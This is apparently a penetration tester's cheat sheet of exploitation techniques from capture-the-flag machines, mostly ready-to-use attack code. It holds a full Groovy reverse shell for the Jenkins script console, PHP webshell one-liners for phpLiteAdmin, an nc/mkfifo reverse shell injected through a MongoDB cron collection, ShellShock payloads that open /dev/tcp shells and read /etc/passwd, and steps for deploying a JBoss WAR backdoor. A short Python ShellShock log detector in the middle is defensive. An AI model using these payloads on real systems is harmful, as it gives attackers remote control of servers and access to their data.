Exploitation Techniques

Useful Commands

  • Testing for code execution: sudo tcpdump -i tun0 ip proto \icmp -vv

  • powershell.exe Invoke-WebRequest -URI http://<URL>/$env:UserName

    • $env:userdnsdomain

Decryption

Exploiting HTTP PUT Method

WebDAV

  • Enumerate PUT Method : Allowed File Types

kali@kali:~/HTB/Grandpa$ davtest -url 10.10.10.14
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                10.10.10.14
********************************************************
NOTE    Random string for this session: aW_9mlHPNp8nXu
********************************************************
 Creating directory
MKCOL           FAIL
********************************************************
 Sending test files
PUT     pl      FAIL
PUT     jhtml   FAIL
PUT     txt     FAIL
PUT     html    FAIL
PUT     cfm     FAIL
PUT     cgi     FAIL
PUT     aspx    FAIL
PUT     asp     FAIL
PUT     shtml   FAIL
PUT     jsp     FAIL
PUT     php     FAIL

Drupal Code Exec

  • Authentication required

Jenkins

  • Reference: HTB Jeeves

Script Console

  • Execute Groovy script reverse shell on the server

String host="<IP>"; int port=9001; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close()

PHP Type Juggling

Method 1

  • '==' operator: Loose comparison

  • '===' operator: Strict comparison (Fix)

  • Type juggling means that if PHP decides both operands look like numbers, even if they are actually strings, it converts them both and performs a numeric comparison.

Method 2

  • Sending in the password POST data as an array.

username=admin&password=admin

Change this to:

username=admin&password[]=

Explanation: PHP is generous with how it handles comparing different types of data. So if the PHP code is doing a string compare of a password from a database (or hard-coded, as is the case here) against the user input, it might look like this:

if(strcmp($_REQUEST['password'], $password) == 0)

strcmp returns where the two strings differ, as I can see in an interactive PHP terminal (run php -a):

php > strcmp("admin", "0xdf");
php > echo strcmp("admin", "0xdf");  //5-4=1
1
php > echo strcmp("admin", "admin0xdf");
-4
php > echo strcmp("admin", "admin");
0

If I pass in an array as one of the strings, PHP fails:

php > echo strcmp(array(), "admin");
PHP Warning:  strcmp() expects parameter 1 to be string, array given in php shell code on line 1

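However, it is actually returning NULL, and if that NULL is then loosely compared to 0, it evaluates true (this is the behaviour before PHP 8.0; from PHP 8.0 onward, strcmp() throws a TypeError when given an array):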

php > if (strcmp(array(), "admin") == 0) { echo "oops"; }
PHP Warning:  strcmp() expects parameter 1 to be string, array given in php shell code on line 1
oops

phpLiteAdmin v1.9

Exploitation:

  • Create a database:

  • Create a table with 1 field

  • Create a field, change the Type to TEXT, and enter our script:

    • <?php echo shell_exec($_GET["cmd"]); exit; ?>

    • <?php system($_REQUEST["cmd"]);?>

MongoDB

  • Default Port: 27017

#Connect
mongo -u <username> -p <password> <IP> <db-name>
mongo --port <port> -u <username> -p <password> <IP>

Commands

db
use <db-name>
show tables
show collections

#Insert single document: 
db.<collectionName>.insertOne({field1: "value", field2: "value"})
#Insert multiple docs
db.<collectionName>.insert([{field1: "value1"}, {field1: "value2"}])

#cmd is used here based on the cron job file.
db.tasks.insertOne({ cmd: "/bin/bash /tmp/shell.sh" });
db.tasks.insert({ cmd : "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 9001 >/tmp/f" });

#To verify if command has been run. Should be empty if command is run
db.tasks.find()

Payload

msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.13 LPORT=9001 R > shell.sh

ShellShock Vulnerability [CVE-2014-6271]

  • This vulnerability impacts Bash. Bash is not usually reachable through a web application, but it can be indirectly exposed through a Common Gateway Interface (CGI).

  • CGIs commonly use Python or Perl, but it's not uncommon (on old servers) to find a CGI written in Shell or even C.

  • When you call a CGI, the web server (Apache here) will start a new process and run the CGI. Here it will start a Bash process and run the CGI script.

  • Apache needs to pass information to the CGI script. To do so, it uses environment variables, which are available inside the CGI script. This allows Apache to easily pass every header (amongst other information) to the CGI. If you have an HTTP header named Blah in your request, you will have an environment variable named HTTP_BLAH available in your CGI.

Fingerprint directories such as /cgi-sys, /cgi-mod, /cgi-bin, /session_login.cgi etc.

Theory

The source of the issue is that Bash can carry function declarations inside its environment variables.

First, we need to declare that the environment variable is a function using (). Then we add an empty body for the function. Finally, we can start adding the command we want to run after the function declaration. More details can be found in the following email on oss-sec

Apache uses environment variables to pass headers to the CGI. Since it's a Bash-based CGI, we will be able to run arbitrary commands by declaring an empty function and adding a command after this declaration.

Exploitation

  • Vulnerable Headers:

    • Referer

    • User-Agent

gobuster dir -w /directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -x sh,cgi

nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

#Payload
()<space>{ :;};
() { :;}; <Bash Command>

() {: ;}; echo $(</etc/passwd)
() { :;}; echo; /usr/bin/id;

() { :;}; echo; /usr/bin/wget http://<IP>
() { :;}; /bin/sh -i >& /dev/tcp/10.10.14.13/9002 0>&1
() { ignored;};/bin/sh -i >& /dev/tcp/10.10.14.13/9001 0>&1

#Reverse Shell
#CGI scripts are Perl scripts, so if you have compromised a server that can execute .cgi scripts, you can upload a Perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl), change the extension from .pl to .cgi, give it execute permissions (chmod +x) and access the reverse shell from the web browser to execute it.

  • () { ignored;}; is the ShellShock exploit

  • /bin/bash -i is an interactive Bash session

  • >& /dev/tcp/<IP>/<PORT> redirects standard output and standard error to the remote host (i.e. /dev/tcp/1.2.3.4/8080 redirects the Bash session to IP 1.2.3.4 on TCP port 8080)

  • 0>&1 reads the standard input. This should be 0<&1 but it works well in both cases.
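Detection side of the above, as an added example that is not part of the original notes: it parses Apache combined-format access log lines and flags requests whose Referer or User-Agent begins a Bash function definition. The sample log lines, their IP addresses and the name find_shellshock_attempts are constructed for illustration.

```python
import re

def _quoted(name):
    # A double-quoted log field; Apache writes embedded quotes as \"
    return r'"(?P<%s>(?:[^"\\]|\\.)*)"' % name

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] ' + _quoted("request")
    + r' (?P<status>\d{3}) \S+ ' + _quoted("referer") + ' ' + _quoted("user_agent") + r'\s*$'
)

# Vulnerable Bash only imports a variable as a function when its value begins with "() {",
# so the match is anchored at the start of the header value.
FUNC_DEF_RE = re.compile(r'^\s*\(\)\s*\{')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 41 "-" "() { :;}; echo; /usr/bin/id;"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 500 0 "() { :;};" "curl/7.88.1"',
    # "() {" appears mid-value only, so Bash would not treat it as a function: must not be flagged
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /app.js HTTP/1.1" 200 90 "-" "ExampleBot/1.0 callback() { }"',
]

def find_shellshock_attempts(lines):
    """Return one record per line whose Referer or User-Agent starts with a function definition."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line.rstrip("\n"))
        if m is None:
            continue  # not combined format; skip rather than guess at field positions
        fields = [f for f in ("referer", "user_agent") if FUNC_DEF_RE.search(m[f])]
        if fields:
            parts = m["request"].split(" ")
            hits.append({
                "line": lineno,
                "ip": m["ip"],
                "path": parts[1] if len(parts) > 1 else m["request"],
                "status": int(m["status"]),
                "fields": fields,
            })
    return hits

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

Headers other than Referer and User-Agent are not written to a combined-format log, so this check only covers the two headers listed above.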

Splunk 7.0

Reference:

JBoss

Admin-Console

Check for default credentials : admin::admin.

  • With admin privileges, we can upload a war file locally and gain a web shell.

  • Once uploaded, activate the WAR file within the console, after which the file can be accessed through a browser.

Default JMX-Console

Navigate to the JMX Console on the target host (http://<URL:8080>/jmx-console/)

If the JMX-Console is not password-protected, a malicious WAR file can be requested from an attacker-controlled server. This WAR file is downloaded and automatically deployed onto the JBoss server. This can be done via 2 methods:

  • Search for service=MainDeployer [Jboss.system] (Walkthrough: Reference)

  • Search for : flavor=URL,type=DeploymentScanner[Jboss.deployment] (Walkthrough: Reference)

Exploitation

  • Download a WAR file backdoor.

  • Host the malicious WAR file on an attacker-controlled server. (python3 -m http.server)

  • Invoke a request to the hosted file. (java.net.URL)

  • Sometimes outbound requests to the internet may be blocked. In that case host the file locally.

  • If successful, you can access the uploaded file at <URL>:8080/cmd/cmd.jsp

  • Get the command GUI by following the instructions from the WAR file's git repo.
